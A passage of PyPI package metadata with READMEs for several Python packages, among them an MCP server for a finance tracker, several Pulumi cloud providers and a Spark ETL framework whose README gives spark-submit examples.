"feedparser>=6.0; extra == \"all\"",
"nfl-data-py>=0.3; extra == \"all\"",
"pandas>=2.0; extra == \"all\"",
"fastf1>=3.0; extra == \"dev\"",
"pandas>=2.0; extra == \"dev\"",
"pytest>=8.0; extra == \"dev\"",
"ruff>=0.9; extra == \"dev\"",
"fastf1>=3.0; extra == \"f1\"",
"pandas>=2.0; extra == \"f1\"",
"nfl-data-py>=0.3; extra == \"nfl\""
] | [] | [] | [] | [] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T06:32:31.094655 | sports_skills-0.6.0.tar.gz | 142,520 | 6f/7a/832403cbbb9a78546bd0053a0b5df328b7cb9b0e9092349dbd49400a8800/sports_skills-0.6.0.tar.gz | source | sdist | null | false | 568c75da13bfc6163c7b0289931867e1 | 803458c5cab44cd4088e0841c9dd09c6a1826bc1de05b6c19cafa68c232e8268 | 6f7a832403cbbb9a78546bd0053a0b5df328b7cb9b0e9092349dbd49400a8800 | MIT | [
"LICENSE"
] | 220 |
2.4 | corpus-mcp | 0.1.3 | MCP Server for Corpus Tracker - Financial Portfolio Assistant | # Corpus MCP Server
A Model Context Protocol (MCP) server for the Corpus Tracker application. This server allows AI assistants (like Claude) to securely interact with your financial portfolio, enabling them to fetch holdings, analyze net worth, and manage transactions.
## Features
- **Portfolio Analytics**: Fetch net worth, asset allocation, and top holdings.
- **Asset Management**: List, add, and remove Gold and Stock holdings.
- **Finance Tracking**: Log income and expenses, view transaction history, and analyze cash flow.
- **Secure Authentication**: Uses API Key authentication to communicate with your Corpus Tracker backend.
## Available Tools
### Profile & Management
- `get_my_profile`: Get the current user's profile and settings.
- `list_corpora`: List all corpora (profiles) the user belongs to.
### Analytics
- `get_portfolio_summary`: Get aggregated net worth, asset breakdown, and liabilities.
- `get_top_holdings(limit)`: Get top holdings by value.
- `get_portfolio_history`: Get portfolio history.
### Gold Holdings
- `list_gold_holdings`: List all gold holdings.
- `add_gold_holding(weight_grams, purchase_price, purchase_date)`: Add a new gold holding.
- `delete_gold_holding(holding_id)`: Delete a gold holding by ID.
- `live_gold_price()`: Get live gold price.
- `history_of_gold_price(limit)`: Get history of gold price.
### Stock Holdings
- `list_stock_holdings`: List all stock holdings.
- `add_stock_holding(symbol, quantity, avg_price)`: Add a new stock holding.
- `update_stock_holding(holding_id, symbol, quantity, avg_price)`: Update an existing stock holding.
- `delete_stock_holding(holding_id)`: Delete a stock holding by ID.
- `live_stock_price(symbol)`: Get live stock price.
- `history_of_stock_price(symbol, limit)`: Get history of stock price.
### Financial Transactions
- `list_transactions(start_date, end_date, category, type, limit)`: List transactions with filters.
- `add_transaction(type, amount, category, description, date)`: Add a new income or expense transaction.
- `delete_transaction(txn_id)`: Delete a transaction by ID.
- `get_cashflow_trend(days)`: Get income vs expense trend for the last N days.
### Stock Transactions
- `search_stock_symbol(query)`: Search for stock symbols.
- `add_stock_transaction(symbol, holding_id, transaction_type, quantity, price_per_share, transaction_date, notes)`: Add a new stock transaction.
### Mutual Fund Holdings
- `list_mutual_fund_holdings`: List all mutual fund holdings.
### Emergency Fund Management
- `list_emergency_fund_holdings`: List all emergency fund holdings.
- `add_emergency_fund_contribution(amount, date, source, notes)`: Add a new emergency fund contribution.
## Installation
```bash
pip install corpus-mcp
```
## Configuration
The server requires two environment variables to connect to your backend:
- `API_URL`: The URL of your Corpus Tracker backend API (e.g., `https://my-corpus.vercel.app/api/v1`).
- `API_KEY`: Your personal API Key generated from the Corpus Tracker settings.
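Since the server reads both variables from the environment at startup, a quick pre-flight check gives a clearer error than a failed request later. This snippet is illustrative and not part of corpus-mcp:

```python
import os

def missing_corpus_env(env=None) -> list[str]:
    """Return the names of required corpus-mcp variables that are unset.

    Illustrative helper: checks the API_URL and API_KEY variables the
    server expects. Pass a mapping to check something other than os.environ.
    """
    env = os.environ if env is None else env
    return [name for name in ("API_URL", "API_KEY") if not env.get(name)]
```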
## Usage
### Running Standalone
You can run the server directly:
```bash
# Set environment variables
export API_URL="https://my-corpus.vercel.app/api/v1"
export API_KEY="sk_..."
# Run the server
corpus-mcp
```
### Using with Claude Desktop
Add the following configuration to your `claude_desktop_config.json`:
```json
{
"mcpServers": {
"corpus-tracker": {
"command": "uvx",
"args": [
"corpus-mcp"
],
"env": {
"API_URL": "https://my-corpus.vercel.app/api/v1",
"API_KEY": "your_api_key_here"
}
}
}
}
```
## Development
To install dependencies and run locally:
```bash
# Install dependencies
pip install .
# Run dev server
corpus-mcp
```
## License
MIT
| text/markdown | null | Mathan Karthik <mathanbe18@gmail.com> | null | null | MIT | corpus-tracker, finance, mcp, mcp-server | [
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Topic :: Office/Business :: Financial"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"httpx>=0.27.0",
"mcp>=1.0.0",
"python-dotenv>=1.0.0"
] | [] | [] | [] | [
"Homepage, https://github.com/Mathankarthik18/corpus-mcp",
"Repository, https://github.com/Mathankarthik18/corpus-mcp",
"Documentation, https://github.com/Mathankarthik18/corpus-mcp#readme"
] | twine/6.2.0 CPython/3.13.0 | 2026-02-20T06:31:43.206781 | corpus_mcp-0.1.3.tar.gz | 48,430 | 06/5f/b37918477b56204f81146a5800585409f9f78913ab79223d9afbfbe0c27e/corpus_mcp-0.1.3.tar.gz | source | sdist | null | false | 39a8c67af372b4fc460ef206a057c922 | 50a47ff68a8e050d7601d1ed306e8395481feea6758a96e57fd537467ff6ef89 | 065fb37918477b56204f81146a5800585409f9f78913ab79223d9afbfbe0c27e | null | [] | 229 |
2.4 | pulumi-meraki | 0.5.0a1771568420 | A Pulumi package for creating and managing Cisco Meraki resources | # Cisco Meraki Resource Provider
The Cisco Meraki Resource Provider lets you manage [meraki](https://www.pulumi.com/registry/packages/meraki/) resources.
## Installing
This package is available for several languages/platforms:
### Node.js (JavaScript/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
```bash
npm install @pulumi/meraki
```
or `yarn`:
```bash
yarn add @pulumi/meraki
```
### Python
To use from Python, install using `pip`:
```bash
pip install pulumi_meraki
```
### Go
To use from Go, use `go get` to grab the latest version of the library:
```bash
go get github.com/pulumi/pulumi-meraki/sdk/go/...
```
### .NET
To use from .NET, install using `dotnet add package`:
```bash
dotnet add package Pulumi.Meraki
```
## Reference
For detailed reference documentation, please visit [the Pulumi registry](https://www.pulumi.com/registry/packages/meraki/api-docs/).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, meraki, category/network | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.com",
"Repository, https://github.com/pulumi/pulumi-meraki"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:31:20.688873 | pulumi_meraki-0.5.0a1771568420.tar.gz | 817,336 | fb/e8/53ccefb56cf8a634626c9a728f35ef0d41f01ed32f5720076f93d15c50d3/pulumi_meraki-0.5.0a1771568420.tar.gz | source | sdist | null | false | aa8bc463548a19fb7b03ea900906c4ff | bef0a6ebc5dbb5251d61a169fd3bc5680c61e37cc7590f12fb765a081b6f9593 | fbe853ccefb56cf8a634626c9a728f35ef0d41f01ed32f5720076f93d15c50d3 | null | [] | 197 |
2.4 | greenstream-config | 4.6.0 | A library for reading / writing Greenstream config files | # Greenstream Config
This contains files for reading/writing configuration classes for Greenstream.
## Release
Run the `Release` action on GitHub.
**IT IS PUBLISHED PUBLICLY TO PYPI**
| text/markdown | Greenroom Robotics | team@greenroomrobotics.com | David Revay | david.revay@greenroomrobotics.com | Copyright (C) 2023, Greenroom Robotics | null | [
"Development Status :: 3 - Alpha",
"Environment :: Plugins",
"Intended Audience :: Developers",
"Programming Language :: Python",
"Topic :: Software Development :: Build Tools"
] | [] | https://github.com/Greenroom-Robotics/greenstream | null | null | [] | [] | [] | [
"setuptools"
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.12.3 | 2026-02-20T06:30:26.625375 | greenstream_config-4.6.0.tar.gz | 5,392 | 4a/38/a2d4c514b00eceb02180b5898743418e1552c100ab2f04324c273498f94e/greenstream_config-4.6.0.tar.gz | source | sdist | null | false | d531c53a53ae768042eb8e22743301c1 | 9580b27bfeae52da7f8f19ceead01b8639873e2e91156961521c1b3b32c4b3ff | 4a38a2d4c514b00eceb02180b5898743418e1552c100ab2f04324c273498f94e | null | [] | 277 |
2.4 | pulumi-nomad | 2.6.0a1771568519 | A Pulumi package for creating and managing nomad cloud resources. | [](https://github.com/pulumi/pulumi-nomad/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/nomad)
[](https://pypi.org/project/pulumi-nomad)
[](https://badge.fury.io/nu/pulumi.nomad)
[](https://pkg.go.dev/github.com/pulumi/pulumi-nomad/sdk/v2/go)
[](https://github.com/pulumi/pulumi-nomad/blob/master/LICENSE)
# HashiCorp Nomad Resource Provider
The HashiCorp Nomad Resource Provider lets you manage Nomad resources.
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (JavaScript/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/nomad
or `yarn`:
$ yarn add @pulumi/nomad
### Python
To use from Python, install using `pip`:
$ pip install pulumi_nomad
### Go
To use from Go, use `go get` to grab the latest version of the library
$ go get github.com/pulumi/pulumi-nomad/sdk/v2
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Nomad
## Configuration
The following configuration points are available:
- `nomad:address` - The HTTP(S) API address of the Nomad agent. This must include the leading protocol (e.g. https://).
This can also be specified as the `NOMAD_ADDR` environment variable.
- `nomad:region` - The Nomad region to target. This can also be specified as the `NOMAD_REGION` environment variable.
- `nomad:httpAuth` - HTTP Basic Authentication credentials to be used when communicating with Nomad, in the format of
either `user` or `user:pass`. This can also be specified using the `NOMAD_HTTP_AUTH` environment variable.
- `nomad:caFile` - A local file path to a PEM-encoded certificate authority used to verify the remote agent's
certificate. This can also be specified as the `NOMAD_CACERT` environment variable.
- `nomad:caPerm` - PEM-encoded certificate authority used to verify the remote agent's certificate.
- `nomad:certFile` - A local file path to a PEM-encoded certificate provided to the remote agent. If this is specified,
key_file or key_pem is also required. This can also be specified as the `NOMAD_CLIENT_CERT` environment variable.
- `nomad:certPem` - PEM-encoded certificate provided to the remote agent. If this is specified, `keyFile` or `keyPem` is also required.
- `nomad:keyFile` - A local file path to a PEM-encoded private key. This is required if `certFile` or `certPem` is
specified. This can also be specified via the `NOMAD_CLIENT_KEY` environment variable.
- `nomad:keyPem` - PEM-encoded private key. This is required if `certFile` or `certPem` is specified.
- `nomad:headers` - A configuration block, described below, that provides headers to be sent along with all
requests to Nomad. This block can be specified multiple times.
- `nomad:vaultToken` - A Vault token used when submitting the job. This can also be specified as the `VAULT_TOKEN`
environment variable or using a Vault token helper (see Vault's documentation for more details).
- `nomad:consulToken` - A Consul token used when submitting the job. This can also be specified as the
`CONSUL_HTTP_TOKEN` environment variable. See below for strategies when multiple Consul tokens are required.
- `nomad:secretId` - The Secret ID of an ACL token to make requests with, for ACL-enabled clusters. This can also be
specified via the `NOMAD_TOKEN` environment variable.
The `nomad:headers` configuration block accepts the following arguments:
- `name` - The name of the header.
- `value` - The value of the header.
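The configuration points above can be set per stack with `pulumi config set`; for example (values are placeholders):

```shell
# Example stack configuration (placeholder values):
pulumi config set nomad:address https://nomad.example.com:4646
pulumi config set nomad:region global
# Store the ACL token as an encrypted secret:
pulumi config set --secret nomad:secretId <token>
```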
## Reference
For further information, please visit [the Nomad provider docs](https://www.pulumi.com/docs/intro/cloud-providers/nomad)
or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/nomad).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, nomad | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-nomad"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:30:24.251250 | pulumi_nomad-2.6.0a1771568519.tar.gz | 99,547 | 33/bf/1d394dce01850c8083d48bc58d40ec847505740a5ad98fb6d5473c19bea1/pulumi_nomad-2.6.0a1771568519.tar.gz | source | sdist | null | false | 1ce71bbe05bcaa528b6c0eee2da067db | 980cce4c3dfaff38d71cd7530ebd3f8647382b325be48b33895f4582224397a7 | 33bf1d394dce01850c8083d48bc58d40ec847505740a5ad98fb6d5473c19bea1 | null | [] | 194 |
2.1 | pyqqq | 0.12.227 | Package for quantitative strategy development on the PyQQQ platform | # PyQQQ SDK
## How to Use the Package
You can install it by running the following command:
```
pip install pyqqq
```
## Setting Up the Development Environment
0. Create a Virtual Environment (Optional)
You can create and use a virtual environment with the following steps:
```
pyqqq-user:$ cd sdk
pyqqq-user:sdk:$ python -m venv .venv --prompt sdk
pyqqq-user:sdk:$ source .venv/bin/activate
(sdk) pyqqq-user:sdk:$
```
1. Install Poetry
```
(sdk) pyqqq-user:sdk:$ pip install poetry
```
2. Install Dependencies
```
(sdk) pyqqq-user:sdk:$ poetry install
```
| text/markdown | PyQQQ team | pyqqq.cs@gmail.com | null | null | MIT | null | [
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12"
] | [] | null | null | <4.0,>=3.9 | [] | [] | [] | [
"tinydb<5.0.0,>=4.8.0",
"requests<3.0.0,>=2.31.0",
"python-dotenv<2.0.0,>=1.0.1",
"websockets<13.0,>=12.0",
"pandas<3.0.0,>=2.0.3",
"cssutils<3.0.0,>=2.10.2",
"cachetools<6.0.0,>=5.3.3",
"pika<2.0.0,>=1.3.2",
"pycryptodome<4.0.0,>=3.20.0",
"diskcache<6.0.0,>=5.6.3",
"pandas-market-calendars<5.0.0,>=4.4.2"
] | [] | [] | [] | [
"Documentation, https://docs.pyqqq.net"
] | poetry/1.8.3 CPython/3.11.7 Linux/6.6.113+ | 2026-02-20T06:30:07.191474 | pyqqq-0.12.227.tar.gz | 184,236 | fb/45/d27d4b0d2adc4f412dd391a09017b951b6506f4a96211acdd7f3b3feef98/pyqqq-0.12.227.tar.gz | source | sdist | null | false | 582f8ab781ac24c422537c253afbee69 | 42792a407bf08e83370e3f5bf0814f21011625f1158fc71ed872cd8c09862b8a | fb45d27d4b0d2adc4f412dd391a09017b951b6506f4a96211acdd7f3b3feef98 | null | [] | 229 |
2.4 | pulumi-mongodbatlas | 4.5.0a1771568387 | A Pulumi package for creating and managing mongodbatlas cloud resources. | [](https://github.com/pulumi/pulumi-mongodbatlas/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/mongodbatlas)
[](https://pypi.org/project/pulumi-mongodbatlas)
[](https://badge.fury.io/nu/pulumi.mongodbatlas)
[](https://pkg.go.dev/github.com/pulumi/pulumi-mongodbatlas/sdk/v2/go)
[](https://github.com/pulumi/pulumi-mongodbatlas/blob/master/LICENSE)
# MongoDB Atlas provider
The MongoDB Atlas resource provider for Pulumi lets you interact with MongoDB Atlas in your infrastructure
programs. To use this package, please [install the Pulumi CLI first](https://pulumi.io/).
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (JavaScript/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/mongodbatlas
or `yarn`:
$ yarn add @pulumi/mongodbatlas
### Python
To use from Python, install using `pip`:
$ pip install pulumi-mongodbatlas
### Go
To use from Go, use `go get` to grab the latest version of the library
$ go get github.com/pulumi/pulumi-mongodbatlas/sdk/v2
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Mongodbatlas
## Configuration
The following configuration points are available:
- `mongodbatlas:publicKey` - (Optional) This is the MongoDB Atlas API public_key. It must be provided, but it can also be
sourced from the `MONGODB_ATLAS_PUBLIC_KEY` environment variable.
- `mongodbatlas:privateKey` - (Optional) This is the MongoDB Atlas private_key. It must be provided, but it can also be
sourced from the `MONGODB_ATLAS_PRIVATE_KEY` environment variable.
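The keys can be supplied either through the environment or as stack configuration; for example (values are placeholders):

```shell
# Via environment variables (placeholder values):
export MONGODB_ATLAS_PUBLIC_KEY="<public-key>"
export MONGODB_ATLAS_PRIVATE_KEY="<private-key>"
# Or on the stack, keeping the private key encrypted:
pulumi config set mongodbatlas:publicKey <public-key>
pulumi config set --secret mongodbatlas:privateKey <private-key>
```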
## Reference
For further information, please visit [the MongoDB Atlas provider docs](https://www.pulumi.com/docs/intro/cloud-providers/mongodbatlas) or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/mongodbatlas).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, mongodbatlas | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-mongodbatlas"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:29:49.686261 | pulumi_mongodbatlas-4.5.0a1771568387.tar.gz | 596,513 | e6/74/06f9f9ea3c97346fadbc4dc283d9d8be62fae38d0bdb6e125e93b4822feb/pulumi_mongodbatlas-4.5.0a1771568387.tar.gz | source | sdist | null | false | c254f3a8d4d6afff58c9e9cc07e7c73e | 8ab44e035e2e46c878147a2716ca4090dd3a225951569bca5cf4ad85257b7b97 | e67406f9f9ea3c97346fadbc4dc283d9d8be62fae38d0bdb6e125e93b4822feb | null | [] | 193 |
2.4 | pulumi-newrelic | 5.62.0a1771568491 | A Pulumi package for creating and managing New Relic resources. | [](https://github.com/pulumi/pulumi-newrelic/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/newrelic)
[](https://pypi.org/project/pulumi-newrelic)
[](https://badge.fury.io/nu/pulumi.newrelic)
[](https://pkg.go.dev/github.com/pulumi/pulumi-newrelic/sdk/v5/go)
[](https://github.com/pulumi/pulumi-newrelic/blob/master/LICENSE)
# New Relic Provider
The New Relic resource provider for Pulumi lets you use New Relic resources in your cloud programs.
To use this package, please [install the Pulumi CLI first][1].
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (JavaScript/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/newrelic
or `yarn`:
$ yarn add @pulumi/newrelic
### Python
To use from Python, install using `pip`:
$ pip install pulumi_newrelic
### Go
To use from Go, use `go get` to grab the latest version of the library
$ go get github.com/pulumi/pulumi-newrelic/sdk/v5
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Newrelic
## Configuration
The following configuration points are available:
- `newrelic:apiKey` - Your New Relic API key. The `NEW_RELIC_API_KEY` environment variable can also be used.
- `newrelic:adminApiKey` - Your New Relic Admin API key. The `NEW_RELIC_ADMIN_API_KEY` environment variable can also be used.
- `newrelic:region` - The region for the data center for which your New Relic account is configured. The New Relic region
can also be set via the environment variable `NEW_RELIC_REGION`. Valid values are `US` or `EU`. Only one region per
provider block can be configured. If you have accounts in both regions, you must instantiate two providers -
one for US and one for EU.
- `newrelic:insecureSkipVerify` - Trust self-signed SSL certificates. If omitted, the `NEW_RELIC_API_SKIP_VERIFY` environment
variable is used.
- `newrelic:insightsInsertKey` - Your Insights insert key used when inserting Insights events via the `insights.Event` resource.
Can also use `NEW_RELIC_INSIGHTS_INSERT_KEY` environment variable.
- `newrelic:insightsInsertUrl` - This argument changes the Insights insert URL (default is `https://insights-collector.newrelic.com/v1/accounts`).
If the New Relic account is in the EU, the Insights API URL must be set to `https://insights-collector.eu.newrelic.com/v1`.
- `newrelic:caCerts` - A path to a PEM-encoded certificate authority used to verify the remote agent's certificate. The
`NEW_RELIC_API_CACERT` environment variable can also be used.
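These can also be set per stack with `pulumi config set`; for example (values are placeholders):

```shell
# Example stack configuration (placeholder values):
pulumi config set newrelic:region US
# Keep the API key encrypted in the stack config:
pulumi config set --secret newrelic:apiKey <api-key>
```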
## Reference
For further information, please visit [the NewRelic provider docs](https://www.pulumi.com/docs/intro/cloud-providers/newrelic) or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/newrelic).
[1]: https://www.pulumi.com/docs
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, new relic | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-newrelic"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:29:38.948493 | pulumi_newrelic-5.62.0a1771568491.tar.gz | 361,682 | 12/6b/7e0fe75b1910d01614e620a85992b84c85ae0ecf11eda81eaac0df13832a/pulumi_newrelic-5.62.0a1771568491.tar.gz | source | sdist | null | false | 032520f62eec19527cf80a0db92bc4b3 | 3fd39cdfb6ed6f2563ed027f8df131f267d318e1fe1267590e5293c6abcd518b | 126b7e0fe75b1910d01614e620a85992b84c85ae0ecf11eda81eaac0df13832a | null | [] | 278 |
2.4 | xursparks | 1.2.12.post3 | Encapsulating Apache Spark for Easy Usage | # Xursparks - XAIL's Apache Spark Framework
## Overview
Welcome to the Xurpas AI Lab (XAIL) department's Apache Spark Framework. This framework is specifically designed to help XAIL developers implement Extract, Transform, Load (ETL) processes seamlessly and uniformly. Additionally, it includes integration capabilities with the Data Management and Configuration Tool (DMCT) to streamline your data workflows.
## Table of Contents
1. [Introduction](#introduction)
2. [Prerequisites](#prerequisites)
3. [Installation](#installation)
4. [Usage](#usage)
- [Setting Up Your Spark Application](#setting-up-your-spark-application)
- [ETL Process Implementation](#etl-process-implementation)
- [Integration with DMCT](#integration-with-dmct)
5. [Best Practices](#best-practices)
6. [Contributing](#contributing)
7. [Support](#support)
8. [License](#license)
## Introduction
This framework aims to provide a robust and standardized approach for XAIL developers to handle ETL processes using Apache Spark. By leveraging this framework, you can ensure that your data pipelines are efficient, maintainable, and easily integrable with the DMCT tool.
## Prerequisites
Before you begin, ensure you have met the following requirements:
- Apache Spark 3.0 or higher
- Python 3.10 or higher
- Access to the DMCT tool and relevant API keys
## Installation
To use the framework, follow these steps:
1. Install `xursparks` in your Python environment:
```
pip install xursparks
```
2. Check that it installed properly:
```
pip list
```
## Usage
### Setting Up Your Spark Application
To start using the framework, create an ETL job as follows:
```
import xursparks
xursparks.initialize(args)
```
### ETL Process Implementation
The framework provides predefined templates and utility functions to facilitate your ETL processes.
```
sourceTables = xursparks.getSourceTables()
sourceDataStorage = sourceTables.get("scheduled_manhours_ELE")
processDate = xursparks.getProcessDate()
sourceDataset = xursparks.loadSourceTable(dataStorage=sourceDataStorage,
processDate=processDate)
```
### Integration with DMCT
To integrate with the DMCT tool, ensure you have the required configuration set up in your `application.properties` file:
```
[default]
usage.logs=<usage logs>
global.config=<dmct global config api>
job.context=<dmct job context api>
api.token="dmct api token"
```
## Best Practices
Always validate your data at each stage of the ETL process.
- Leverage Spark's in-built functions and avoid excessive use of UDFs (User Defined Functions) for better performance.
- Ensure proper error handling and logging to facilitate debugging.
- Keep your ETL jobs modular and maintainable by adhering to the single responsibility principle.
## Contributing
We welcome contributions to improve this framework. Please refer to the CONTRIBUTING.md file for guidelines on how to get started.
## Support
If you encounter any issues or have questions, please reach out to the XAIL support team at support@xail.com.
## License
This project is licensed under the Apache License 2.0. See the LICENSE file for details.
--------------------------------------------------------------------------------
## Running Xursparks Job
* SPARK-SUBMIT
```
spark-submit XurSparkSMain.py \
--master=local[*] \
--client-id=trami-data-folder \
--target-table=talentsolutions.candidate_reports \
--process-date=2023-05-24 \
--properties-file=job-application.properties \
--switch=1
```
* Hadoop Sir Andy Setup
```
python AiLabsCandidatesDatamart.py \
--master=local[*] \
--deploy-mode=cluster \
--client-id=trami-data-folder \
--target-table=ailabs.candidates_transformed \
--process-date=2023-11-15 \
--properties-file=job-application.properties \
--switch=1
```
* Hadoop
```
spark-submit \
--name AiLabsCandidatesDatamart \
--master yarn \
--jars aws-java-sdk-bundle-1.12.262.jar,hadoop-aws-3.3.4.jar \
--conf spark.yarn.dist.files=job-application.properties \
AiLabsCandidatesDatamart.py \
--keytab=hive.keytab \
--principal=hive/hdfscluster.local@HDFSCLUSTER.LOCAL \
--master=yarn \
--deploy-mode=cluster \
--client-id=trami-data-folder \
--target-table=ailabs.candidates_transformed \
--process-date=2023-11-16 \
--properties-file=job-application.properties \
--switch=1
```
* Hadoop 3.3.2
```
spark-submit \
--name AiLabsCandidatesDatamart \
--master yarn \
--keytab hive.keytab \
--principal hive/hdfscluster.local@HDFSCLUSTER.LOCAL \
--jars aws-java-sdk-bundle-1.12.262.jar,hadoop-aws-3.3.4.jar,hive-jdbc-3.1.3.jar \
--conf spark.yarn.dist.files=job-application.properties \
AiLabsCandidatesDatamart.py \
--keytab=hive.keytab \
--principal=hive/hdfscluster.local@HDFSCLUSTER.LOCAL \
--master=yarn \
--deploy-mode=client \
--client-id=trami-data-folder \
--target-table=ailabs.candidates_transformed \
--process-date=2023-11-17 \
--properties-file=job-application.properties \
--switch=1
```
* Hadoop testhdfs 3.3.2
```
spark-submit \
--name HdfsTest \
--master yarn \
--deploy-mode client \
--keytab hive.keytab \
--principal hive/hdfscluster.local@HDFSCLUSTER.LOCAL \
--jars aws-java-sdk-bundle-1.12.262.jar,hadoop-aws-3.3.4.jar \
--conf spark.yarn.dist.files=job-application.properties \
--driver-memory 4g \
--executor-memory 4g \
--executor-cores 2 \
HdfsTest.py \
--keytab=hive.keytab \
--principal=hive/hdfscluster.local@HDFSCLUSTER.LOCAL \
--master=yarn \
--deploy-mode=cluster \
--client-id=trami-data-folder \
--target-table=ailabs.candidates_transformed \
--process-date=2023-11-16 \
--properties-file=job-application.properties \
--switch=1
```
* Hadoop
```
spark-submit \
--name AiLabsCandidatesDatamart \
--master yarn \
--jars aws-java-sdk-bundle-1.12.262.jar,hadoop-aws-3.3.4.jar,hive-jdbc-3.1.3.jar \
--conf spark.yarn.dist.files=job-application.properties \
AiLabsCandidatesDatamart.py \
--master=yarn \
--deploy-mode=client \
--client-id=trami-data-folder \
--target-table=ailabs.candidates_transformed \
--process-date=2023-11-19 \
--properties-file=job-application.properties \
--switch=1
```
* Hadoop Employees
```
spark-submit \
--name AiLabsEmployeeDatamart \
--master yarn \
--keytab hive.keytab \
--principal hive/hdfscluster.local@HDFSCLUSTER.LOCAL \
--jars aws-java-sdk-bundle-1.12.262.jar,hadoop-aws-3.3.4.jar,hive-jdbc-3.1.3.jar,spark-excel_2.12-3.5.0_0.20.1.jar \
--conf spark.yarn.dist.files=job-application.properties \
AiLabsEmployeeDatamart.py \
--keytab=hive.keytab \
--principal=hive/hdfscluster.local@HDFSCLUSTER.LOCAL \
--master=yarn \
--deploy-mode=client \
--client-id=trami-data-folder \
--target-table=ailab.employees \
--process-date=2023-11-30 \
--properties-file=job-application.properties \
--switch=1
```
* Hadoop Candidates
```
spark-submit \
--name AiLabsHdfsDatamart \
--master yarn \
--keytab hive.keytab \
--principal hive/hdfscluster.local@HDFSCLUSTER.LOCAL \
--jars aws-java-sdk-bundle-1.12.262.jar,hadoop-aws-3.3.4.jar,hive-jdbc-3.1.3.jar,spark-excel_2.12-3.5.0_0.20.1.jar \
--conf spark.yarn.dist.files=job-application.properties \
AiLabsHdfsDatamart.py \
--keytab=hive.keytab \
--principal=hive/hdfscluster.local@HDFSCLUSTER.LOCAL \
--master=yarn \
--deploy-mode=client \
--client-id=trami-data-folder \
--target-table=ailab.candidates_transformed_hdfs \
--process-date=2023-11-19 \
--properties-file=job-application.properties \
--switch=1
```
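Each job above passes the same application flags (`--client-id`, `--target-table`, `--process-date`, `--properties-file`, `--switch`) after the script name; `spark-submit` forwards anything following the application file to the script itself rather than consuming it. A minimal sketch of how such flags might be parsed inside a job script (hypothetical — xursparks' actual argument handling may differ):

```python
import argparse

def parse_job_args(argv):
    # Flags placed after the application .py file are forwarded by
    # spark-submit to the script; Spark-level flags may also leak
    # through, so accept and ignore anything unrecognized.
    parser = argparse.ArgumentParser()
    parser.add_argument("--client-id", required=True)
    parser.add_argument("--target-table", required=True)
    parser.add_argument("--process-date", required=True)
    parser.add_argument("--properties-file", default="job-application.properties")
    parser.add_argument("--switch", type=int, default=0)
    args, _unknown = parser.parse_known_args(argv)
    return args

args = parse_job_args([
    "--master=yarn",  # ignored: a Spark-level flag, not an app flag
    "--client-id=trami-data-folder",
    "--target-table=ailabs.candidates_transformed",
    "--process-date=2023-11-19",
    "--switch=1",
])
print(args.client_id, args.target_table, args.switch)
```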
| text/markdown | Randell Gabriel Santos | randellsantos@gmail.com | null | null | MIT | null | [
"Development Status :: 5 - Production/Stable",
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent"
] | [] | https://github.com/dev-doods687/xursparks | null | >=3.10 | [] | [] | [] | [
"setuptools",
"wheel",
"twine",
"requests",
"numpy==1.26.4",
"pandas",
"pyspark==3.5.2",
"boto3",
"openpyxl",
"xurpas_data_quality",
"openai==1.54.5",
"langchain==0.2.17",
"langchain_community==0.2.19",
"langchain_core==0.2.43",
